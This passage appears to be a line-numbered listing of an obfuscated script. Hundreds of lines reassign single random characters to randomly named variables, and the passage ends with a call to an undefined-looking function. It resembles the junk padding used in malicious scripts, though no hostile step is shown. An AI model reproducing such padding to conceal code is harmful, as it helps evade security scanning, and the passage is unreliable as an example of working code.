791 | uvolij = "w"; | |
792 | uvolij = "g"; | |
793 | uvolij = "M"; | |
794 | uvolij = "Z"; | |
795 | uvolij = "A"; | |
796 | uvolij = "y"; | |
797 | uvolij = "k"; | |
798 | uvolij = "S"; | |
799 | uvolij = "l"; | |
800 | uvolij = "R"; | |
801 | uvolij = "f"; | |
802 | uvolij = "o"; | |
803 | uvolij = "t"; | |
804 | uvolij = "M"; | |
805 | uvolij = "T"; | |
806 | uvolij = "g"; | |
807 | uvolij = "z"; | |
808 | uvolij = "g"; | |
809 | uvolij = "Q"; | |
810 | uvolij = "h"; | |
811 | uvolij = "K"; | |
812 | uvolij = "o"; | |
813 | uvolij = "g"; | |
814 | dtuon = "F"; | |
815 | dtuon = "x"; | |
816 | dtuon = "q"; | |
817 | dtuon = "u"; | |
818 | dtuon = "I"; | |
819 | dtuon = "P"; | |
820 | dtuon = "H"; | |
821 | dtuon = "A"; | |
822 | dtuon = "p"; | |
823 | dtuon = "v"; | |
824 | dtuon = "S"; | |
825 | dtuon = "M"; | |
826 | dtuon = "S"; | |
827 | dtuon = "Y"; | |
828 | dtuon = "P"; | |
829 | dtuon = "L"; | |
830 | dtuon = "y"; | |
831 | dtuon = "N"; | |
832 | dtuon = "G"; | |
833 | dtuon = "p"; | |
834 | dtuon = "f"; | |
835 | dtuon = "z"; | |
836 | dtuon = "H"; | |
837 | dtuon = "I"; | |
838 | dtuon = "T"; | |
839 | dtuon = "O"; | |
840 | dtuon = "j"; | |
841 | dtuon = "W"; | |
842 | dtuon = "G"; | |
843 | dtuon = "M"; | |
844 | dtuon = "a"; | |
845 | dtuon = "M"; | |
846 | dtuon = "M"; | |
847 | dtuon = "s"; | |
848 | dtuon = "k"; | |
849 | dtuon = "h"; | |
850 | dtuon = "f"; | |
851 | dtuon = "c"; | |
852 | dtuon = "k"; | |
853 | dtuon = "U"; | |
854 | dtuon = "v"; | |
855 | wjvpx = "z"; | |
856 | wjvpx = "Q"; | |
857 | wjvpx = "m"; | |
858 | wjvpx = "j"; | |
859 | wjvpx = "Q"; | |
860 | wjvpx = "H"; | |
861 | wjvpx = "r"; | |
862 | wjvpx = "x"; | |
863 | wjvpx = "w"; | |
864 | wjvpx = "a"; | |
865 | wjvpx = "Y"; | |
866 | wjvpx = "A"; | |
867 | wjvpx = "r"; | |
868 | wjvpx = "N"; | |
869 | wjvpx = "e"; | |
870 | wjvpx = "n"; | |
871 | wjvpx = "E"; | |
872 | wjvpx = "t"; | |
873 | wjvpx = "G"; | |
874 | wjvpx = "G"; | |
875 | wjvpx = "m"; | |
876 | wjvpx = "R"; | |
877 | wjvpx = "X"; | |
878 | wjvpx = "W"; | |
879 | wjvpx = "Y"; | |
880 | wjvpx = "b"; | |
881 | wjvpx = "Y"; | |
882 | wjvpx = "G"; | |
883 | wjvpx = "q"; | |
884 | wjvpx = "s"; | |
885 | wjvpx = "p"; | |
886 | wjvpx = "Y"; | |
887 | wjvpx = "Z"; | |
888 | wjvpx = "R"; | |
889 | wjvpx = "o"; | |
890 | wjvpx = "C"; | |
891 | wjvpx = "j"; | |
892 | wjvpx = "T"; | |
893 | wjvpx = "H"; | |
894 | wjvpx = "c"; | |
895 | wjvpx = "a"; | |
896 | wjvpx = "N"; | |
897 | efdkdsv = "U"; | |
898 | efdkdsv = "u"; | |
899 | efdkdsv = "W"; | |
900 | efdkdsv = "M"; | |
901 | efdkdsv = "z"; | |
902 | efdkdsv = "j"; | |
903 | efdkdsv = "O"; | |
904 | efdkdsv = "p"; | |
905 | efdkdsv = "Y"; | |
906 | efdkdsv = "W"; | |
907 | efdkdsv = "m"; | |
908 | efdkdsv = "D"; | |
909 | efdkdsv = "Q"; | |
910 | efdkdsv = "c"; | |
911 | efdkdsv = "p"; | |
912 | efdkdsv = "q"; | |
913 | efdkdsv = "I"; | |
914 | efdkdsv = "S"; | |
915 | efdkdsv = "C"; | |
916 | zkzwlleoe = "p"; | |
917 | zkzwlleoe = "B"; | |
918 | zkzwlleoe = "g"; | |
919 | zkzwlleoe = "A"; | |
920 | zkzwlleoe = "X"; | |
921 | zkzwlleoe = "S"; | |
922 | zkzwlleoe = "W"; | |
923 | zkzwlleoe = "z"; | |
924 | zkzwlleoe = "5"; | |
925 | exyckpsar = "L"; | |
926 | exyckpsar = "o"; | |
927 | exyckpsar = "S"; | |
928 | exyckpsar = "d"; | |
929 | exyckpsar = "X"; | |
930 | exyckpsar = "Q"; | |
931 | exyckpsar = "u"; | |
932 | exyckpsar = "w"; | |
933 | exyckpsar = "C"; | |
934 | exyckpsar = "E"; | |
935 | exyckpsar = "P"; | |
936 | exyckpsar = "g"; | |
937 | exyckpsar = "u"; | |
938 | exyckpsar = "o"; | |
939 | exyckpsar = "z"; | |
940 | exyckpsar = "N"; | |
941 | exyckpsar = "a"; | |
942 | exyckpsar = "C"; | |
943 | exyckpsar = "y"; | |
944 | exyckpsar = "d"; | |
945 | exyckpsar = "E"; | |
946 | exyckpsar = "V"; | |
947 | exyckpsar = "y"; | |
948 | exyckpsar = "z"; | |
949 | exyckpsar = "d"; | |
950 | exyckpsar = "e"; | |
951 | exyckpsar = "U"; | |
952 | exyckpsar = "q"; | |
953 | exyckpsar = "j"; | |
954 | ihumu = "h"; | |
955 | ihumu = "M"; | |
956 | ihumu = "A"; | |
957 | ihumu = "N"; | |
958 | ihumu = "Q"; | |
959 | ihumu = "F"; | |
960 | ihumu = "h"; | |
961 | ihumu = "a"; | |
962 | ihumu = "Y"; | |
963 | ihumu = "x"; | |
964 | ihumu = "J"; | |
965 | ihumu = "P"; | |
966 | ihumu = "l"; | |
967 | ihumu = "c"; | |
968 | ihumu = "e"; | |
969 | ihumu = "d"; | |
970 | bbojd = "T"; | |
971 | bbojd = "w"; | |
972 | bbojd = "G"; | |
973 | bbojd = "f"; | |
974 | bbojd = "O"; | |
975 | bbojd = "H"; | |
976 | bbojd = "J"; | |
977 | bbojd = "s"; | |
978 | bbojd = "J"; | |
979 | bbojd = "Q"; | |
980 | bbojd = "D"; | |
981 | bbojd = "F"; | |
982 | bbojd = "L"; | |
983 | bbojd = "P"; | |
984 | bbojd = "z"; | |
985 | bbojd = "E"; | |
986 | bbojd = "X"; | |
987 | bbojd = "a"; | |
988 | bbojd = "Y"; | |
989 | bbojd = "y"; | |
990 | bbojd = "s"; | |
991 | bbojd = "Q"; | |
992 | bbojd = "q"; | |
993 | bbojd = "g"; | |
994 | bbojd = "y"; | |
995 | bbojd = "Y"; | |
996 | bbojd = "Z"; | |
997 | bbojd = "8"; | |
998 | ekjudvxr = "r"; | |
999 | ekjudvxr = "f"; | |
1000 | ekjudvxr = "G"; | |
1001 | ekjudvxr = "K"; | |
1002 | ekjudvxr = "Q"; | |
1003 | ekjudvxr = "p"; | |
1004 | ekjudvxr = "u"; | |
1005 | ekjudvxr = "P"; | |
1006 | ekjudvxr = "H"; | |
1007 | ekjudvxr = "w"; | |
1008 | ekjudvxr = "l"; | |
1009 | ekjudvxr = "D"; | |
1010 | ekjudvxr = "e"; | |
1011 | ekjudvxr = "w"; | |
1012 | ekjudvxr = "N"; | |
1013 | ekjudvxr = "t"; | |
1014 | ekjudvxr = "J"; | |
1015 | ekjudvxr = "P"; | |
1016 | ekjudvxr = "f"; | |
1017 | ekjudvxr = "B"; | |
1018 | ekjudvxr = "m"; | |
1019 | ekjudvxr = "h"; | |
1020 | ekjudvxr = "x"; | |
1021 | ekjudvxr = "g"; | |
1022 | ekjudvxr = "f"; | |
1023 | ekjudvxr = "Y"; | |
1024 | ekjudvxr = "z"; | |
1025 | ekjudvxr = "f"; | |
1026 | ekjudvxr = "v"; | |
1027 | ekjudvxr = "f"; | |
1028 | ekjudvxr = "l"; | |
1029 | ekjudvxr = "p"; | |
1030 | kcoaid = "Z"; | |
1031 | kcoaid = "H"; | |
1032 | kcoaid = "R"; | |
1033 | kcoaid = "o"; | |
1034 | kcoaid = "p"; | |
1035 | kcoaid = "o"; | |
1036 | kcoaid = "V"; | |
1037 | kcoaid = "M"; | |
1038 | kcoaid = "o"; | |
1039 | kcoaid = "d"; | |
1040 | kcoaid = "W"; | |
1041 | kcoaid = "K"; | |
1042 | kcoaid = "T"; | |
1043 | kcoaid = "g"; | |
1044 | kcoaid = "L"; | |
1045 | kcoaid = "Z"; | |
1046 | kcoaid = "H"; | |
1047 | kcoaid = "x"; | |
1048 | kcoaid = "s"; | |
1049 | kcoaid = "R"; | |
1050 | kcoaid = "F"; | |
1051 | kcoaid = "z"; | |
1052 | kcoaid = "p"; | |
1053 | kcoaid = "q"; | |
1054 | kcoaid = "X"; | |
1055 | kcoaid = "J"; | |
1056 | kcoaid = "B"; | |
1057 | kcoaid = "M"; | |
1058 | kcoaid = "n"; | |
1059 | kcoaid = "I"; | |
1060 | kcoaid = "q"; | |
1061 | kcoaid = "v"; | |
1062 | kcoaid = "Y"; | |
1063 | kcoaid = "N"; | |
1064 | kcoaid = "U"; | |
1065 | kcoaid = "0"; | |
1066 | lcgqkdbpk = "g"; | |
1067 | lcgqkdbpk = "c"; | |
1068 | lcgqkdbpk = "C"; | |
1069 | lcgqkdbpk = "a"; | |
1070 | lcgqkdbpk = "d"; | |
1071 | lcgqkdbpk = "H"; | |
1072 | lcgqkdbpk = "v"; | |
1073 | lcgqkdbpk = "h"; | |
1074 | lcgqkdbpk = ":"; | |
1075 | gjwbrmps = "Q"; | |
1076 | gjwbrmps = "r"; | |
1077 | gjwbrmps = "a"; | |
1078 | gjwbrmps = "o"; | |
1079 | gjwbrmps = "O"; | |
1080 | gjwbrmps = "J"; | |
1081 | gjwbrmps = "G"; | |
1082 | gjwbrmps = "F"; | |
1083 | gjwbrmps = "a"; | |
1084 | gjwbrmps = "l"; | |
1085 | gjwbrmps = "N"; | |
1086 | gjwbrmps = "w"; | |
1087 | pmxmp = "f"; | |
1088 | pmxmp = "t"; | |
1089 | pmxmp = "C"; | |
1090 | pmxmp = "O"; | |
1091 | pmxmp = "K"; | |
1092 | pmxmp = "I"; | |
1093 | pmxmp = "Z"; | |
1094 | pmxmp = "K"; | |
1095 | pmxmp = "w"; | |
1096 | pmxmp = "s"; | |
1097 | pmxmp = "x"; | |
1098 | pmxmp = "P"; | |
1099 | pmxmp = "Q"; | |
1100 | pmxmp = "d"; | |
1101 | pmxmp = "C"; | |
1102 | pmxmp = "C"; | |
1103 | pmxmp = "p"; | |
1104 | pmxmp = "U"; | |
1105 | pmxmp = "K"; | |
1106 | pmxmp = "D"; | |
1107 | pmxmp = "I"; | |
1108 | pmxmp = "b"; | |
1109 | pmxmp = "h"; | |
1110 | pmxmp = "J"; | |
1111 | pmxmp = "T"; | |
1112 | pmxmp = "q"; | |
1113 | pmxmp = "t"; | |
1114 | pmxmp = "a"; | |
1115 | pmxmp = "T"; | |
1116 | pmxmp = "B"; | |
1117 | pmxmp = "J"; | |
1118 | pmxmp = "Y"; | |
1119 | pmxmp = "p"; | |
1120 | pmxmp = "s"; | |
1121 | pmxmp = "A"; | |
1122 | pmxmp = "Z"; | |
1123 | pmxmp = "Y"; | |
1124 | pmxmp = "S"; | |
1125 | pmxmp = "O"; | |
1126 | ptvyoljaz = "b"; | |
1127 | ptvyoljaz = "P"; | |
1128 | ptvyoljaz = "d"; | |
1129 | ptvyoljaz = "u"; | |
1130 | ptvyoljaz = "f"; | |
1131 | ptvyoljaz = "e"; | |
1132 | ptvyoljaz = "e"; | |
1133 | ptvyoljaz = "A"; | |
1134 | ptvyoljaz = "W"; | |
1135 | ptvyoljaz = "k"; | |
1136 | tremc = "L"; | |
1137 | tremc = "A"; | |
1138 | tremc = "P"; | |
1139 | tremc = "V"; | |
1140 | tremc = "u"; | |
1141 | tremc = "h"; | |
1142 | tremc = "N"; | |
1143 | tremc = "O"; | |
1144 | tremc = "T"; | |
1145 | tremc = "O"; | |
1146 | tremc = "H"; | |
1147 | tremc = "a"; | |
1148 | mjstrcbg = "L"; | |
1149 | qapfjle = "N"; | |
1150 | qapfjle = "t"; | |
1151 | qapfjle = "I"; | |
1152 | qapfjle = "W"; | |
1153 | qapfjle = "B"; | |
1154 | qapfjle = "r"; | |
1155 | qapfjle = "T"; | |
1156 | qapfjle = "w"; | |
1157 | qapfjle = "q"; | |
1158 | qapfjle = "\\"; | |
1159 | zwdjdnitk = "r"; | |
1160 | wivuj = "x"; | |
1161 | wivuj = "s"; | |
1162 | wivuj = "g"; | |
1163 | wivuj = "s"; | |
1164 | wivuj = "v"; | |
1165 | wivuj = "A"; | |
1166 | wivuj = "G"; | |
1167 | wivuj = "R"; | |
1168 | wivuj = "G"; | |
1169 | wivuj = "y"; | |
1170 | wivuj = "W"; | |
1171 | wivuj = "n"; | |
1172 | wivuj = "i"; | |
1173 | wivuj = "I"; | |
1174 | wivuj = "l"; | |
1175 | wivuj = "B"; | |
1176 | wivuj = "u"; | |
1177 | wivuj = "M"; | |
1178 | wivuj = "Z"; | |
1179 | wivuj = "X"; | |
1180 | wivuj = "M"; | |
1181 | wivuj = "P"; | |
1182 | wivuj = "E"; | |
1183 | wivuj = "x"; | |
1184 | wivuj = "w"; | |
1185 | wivuj = "D"; | |
1186 | wivuj = "i"; | |
1187 | wivuj = "l"; | |
1188 | wivuj = "G"; | |
1189 | wivuj = "Q"; | |
1190 | wivuj = "X"; | |
1191 | wivuj = "J"; | |
1192 | wivuj = "t"; | |
1193 | wivuj = "Q"; | |
1194 | gijmu = "Y"; | |
1195 | gijmu = "I"; | |
1196 | wvrmwqslt = "t"; | |
1197 | wvrmwqslt = "c"; | |
1198 | wvrmwqslt = "D"; | |
1199 | wvrmwqslt = "T"; | |
1200 | wvrmwqslt = "H"; | |
1201 | wvrmwqslt = "e"; | |
1202 | wvrmwqslt = "E"; | |
1203 | wvrmwqslt = "s"; | |
1204 | wvrmwqslt = "c"; | |
1205 | wvrmwqslt = "s"; | |
1206 | wvrmwqslt = "m"; | |
1207 | wvrmwqslt = "c"; | |
1208 | wvrmwqslt = "i"; | |
1209 | wvrmwqslt = "s"; | |
1210 | wvrmwqslt = "S"; | |
1211 | wvrmwqslt = "a"; | |
1212 | wvrmwqslt = "H"; | |
1213 | wvrmwqslt = "F"; | |
1214 | wvrmwqslt = "l"; | |
1215 | wvrmwqslt = "A"; | |
1216 | wvrmwqslt = "r"; | |
1217 | wvrmwqslt = "Z"; | |
1218 | wvrmwqslt = "g"; | |
1219 | wvrmwqslt = "x"; | |
1220 | wvrmwqslt = "v"; | |
1221 | wvrmwqslt = "h"; | |
1222 | wvrmwqslt = "U"; | |
1223 | wvrmwqslt = "c"; | |
1224 | wvrmwqslt = "H"; | |
1225 | wvrmwqslt = "L"; | |
1226 | wvrmwqslt = "P"; | |
1227 | wvrmwqslt = "C"; | |
1228 | wvrmwqslt = "c"; | |
1229 | wvrmwqslt = "u"; | |
1230 | wvrmwqslt = "r"; | |
1231 | wvrmwqslt = "t"; | |
1232 | wvrmwqslt = "m"; | |
1233 | wvrmwqslt = "c"; | |
1234 | lkujbd = "u"; | |
1235 | lkujbd = "K"; | |
1236 | lkujbd = "x"; | |
1237 | lkujbd = "G"; | |
1238 | lkujbd = "Q"; | |
1239 | lkujbd = "d"; | |
1240 | lkujbd = "x"; | |
1241 | lkujbd = "K"; | |
1242 | lkujbd = "F"; | |
1243 | lkujbd = "X"; | |
1244 | lkujbd = "B"; | |
1245 | lkujbd = "f"; | |
1246 | lkujbd = "p"; | |
1247 | lkujbd = "e"; | |
1248 | lkujbd = "B"; | |
1249 | lkujbd = "M"; | |
1250 | lkujbd = "z"; | |
1251 | lkujbd = "T"; | |
1252 | lkujbd = "A"; | |
1253 | lkujbd = "T"; | |
1254 | lkujbd = "s"; | |
1255 | lkujbd = "i"; | |
1256 | lkujbd = "J"; | |
1257 | lkujbd = "F"; | |
1258 | lkujbd = "w"; | |
1259 | lkujbd = "L"; | |
1260 | lkujbd = "O"; | |
1261 | lkujbd = "Z"; | |
1262 | lkujbd = "C"; | |
1263 | lkujbd = "s"; | |
1264 | lkujbd = "J"; | |
1265 | lkujbd = "P"; | |
1266 | lkujbd = "a"; | |
1267 | lkujbd = "B"; | |
1268 | lkujbd = "A"; | |
1269 | lkujbd = "C"; | |
1270 | lkujbd = "I"; | |
1271 | lkujbd = "Q"; | |
1272 | lkujbd = "y"; | |
1273 | lkujbd = "i"; | |
1274 | lkujbd = "f"; | |
1275 | lkujbd = "i"; | |
1276 | lkujbd = "D"; | |
1277 | lkujbd = "_"; | |
1278 | szntteouy ( ); |
|